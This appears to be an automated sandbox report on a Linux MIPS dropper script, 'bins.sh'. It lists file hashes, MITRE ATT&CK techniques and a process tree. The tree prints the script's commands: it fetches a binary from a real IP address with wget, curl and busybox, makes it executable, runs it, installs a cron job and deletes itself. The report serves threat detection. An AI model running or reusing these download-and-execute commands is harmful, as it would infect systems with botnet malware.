14fc537743033a5948506f87016c1e2c4ea8085e17827612c56c230062b20836

Analysis

max time kernel
150s
max time network
154s
platform
debian-9_mips
resource
debian9-mipsbe-20240611-en
resource tags

arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
30-11-2024 03:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

8dfb48b397d092bc48e8d3b7d32069a0
SHA1

81021529c60b12e548c19e8b1d5484a7aa00534d
SHA256

14fc537743033a5948506f87016c1e2c4ea8085e17827612c56c230062b20836
SHA512

7bb13f38afc39d6cad3c95ef1508d10479725e481cf90441c8359903b451379777d2897601289cdbd1f7c1a33eb7be4dc3b3f8b3d4c78ad8cf9460a1fd687525
SSDEEP

192:Da2B5xoc2IU0ORV74+WNtiSYQB5xocIlU0ORVC+W+:u2B5xoc2IU0ORV78tiSFB5xocIlU0OR3

Score

7^/10

defense_evasion discovery execution persistence privilege_escalatio

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 1 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

Processes:

chmod

pid	Process
748	chmod

Executes dropped EXE 1 IoCs

Processes:

oGGGTr6G5WEemElzljRhFuqicguT1YBXDk

ioc	pid	Process
/tmp/oGGGTr6G5WEemElzljRhFuqicguT1YBXDk	749	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk

Renames itself 1 IoCs

Processes:

oGGGTr6G5WEemElzljRhFuqicguT1YBXDk

pid	Process
750	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalatio

Cron

T1053.003

Processes:

crontab

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.zjCyUZ	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

oGGGTr6G5WEemElzljRhFuqicguT1YBXDkcurlcrontabcrontab

description	ioc	Process
File opened for reading	/proc/825/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/11/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/13/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/69/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/769/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/780/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/789/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/804/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/763/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/6/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/23/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/717/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/816/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/794/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/16/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/17/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/724/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/813/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/828/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/753/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/filesystems	crontab
File opened for reading	/proc/24/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/165/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/714/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/821/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/772/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/14/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/227/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/353/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/785/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/3/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/20/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/757/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/71/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/314/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/834/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/21/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/115/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/823/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/18/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/19/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/692/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/720/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/767/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/833/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/22/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/144/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/485/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/716/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/835/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/filesystems	crontab
File opened for reading	/proc/755/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/798/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/827/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/8/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/398/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/775/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/802/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/810/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/817/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/37/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/372/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
File opened for reading	/proc/520/cmdline	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk

Writes file to tmp directory 3 IoCs

Malware often drops required files in the /tmp directory.

Processes:

wgetcurlbusybox

description	ioc	Process
File opened for modification	/tmp/oGGGTr6G5WEemElzljRhFuqicguT1YBXDk	wget
File opened for modification	/tmp/oGGGTr6G5WEemElzljRhFuqicguT1YBXDk	curl
File opened for modification	/tmp/oGGGTr6G5WEemElzljRhFuqicguT1YBXDk	busybox

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:717
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:721
- /usr/bin/wget
  wget http://216.126.231.240/bins/oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
  2⤵
  - Writes file to tmp directory
  PID:725
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:739
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
  2⤵
  - Writes file to tmp directory
  PID:747
- /bin/chmod
  chmod 777 oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
  2⤵
  - File and Directory Permissions Modification
  PID:748
- /tmp/oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
  ./oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
  2⤵
  - Executes dropped EXE
  - Renames itself
  - Reads runtime system information
  PID:749
- - /bin/sh
    sh -c "crontab -l"
    3⤵
    PID:751
  - - /usr/bin/crontab
      crontab -l
      4⤵
      Reads runtime system information
      PID:752
- - /bin/sh
    sh -c "crontab -"
    3⤵
    PID:753
  - - /usr/bin/crontab
      crontab -
      4⤵
      Creates/modifies Cron job
      Reads runtime system information
      PID:758
- /bin/rm
  rm oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
  2⤵
  PID:755
- /usr/bin/wget
  wget http://216.126.231.240/bins/kWoBrYudMSo9lPC8Tj32iiOr3YEVqJ1GNx
  2⤵
  PID:759

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/oGGGTr6G5WEemElzljRhFuqicguT1YBXDk

Filesize
151KB

MD5
3c90d5820bddcf7c5d1bd21dfa49d958

SHA1
5ba05bd489e50af97d6dc45e3a0be60e494d5083

SHA256
bdebb67266d5f96b7d85cfb9644deee81161b54b60b0fded6cf36544a15fa9b2

SHA512
54a0e2ec10040634100fb5c4bddc35f558471f4ff833f9ad20f16ffd14c286cf251841bdaad7c557c3c78efc2094db91038c195c0ddabdecf9beac97ff2ce01a

Download Submit
/var/spool/cron/crontabs/tmp.zjCyUZ

Filesize
210B

MD5
89f2bbabcd0483ab0585aea0315e4af5

SHA1
4613e38b69e4edd6a6c78b29d53b8c2bcedcc23a

SHA256
cd2d0a790a3d28f6e99cf6a859448c25904d4db5053fb655bb76fc6fcc9ff391

SHA512
bdd63d9272c15d655e181d3b35067f78dbd24f951ecaec029df16930197dc3345dd291692f045bb965bbb1af34c3c83f18d87d6151a165b3dcc484637a7f5eef

Download Submit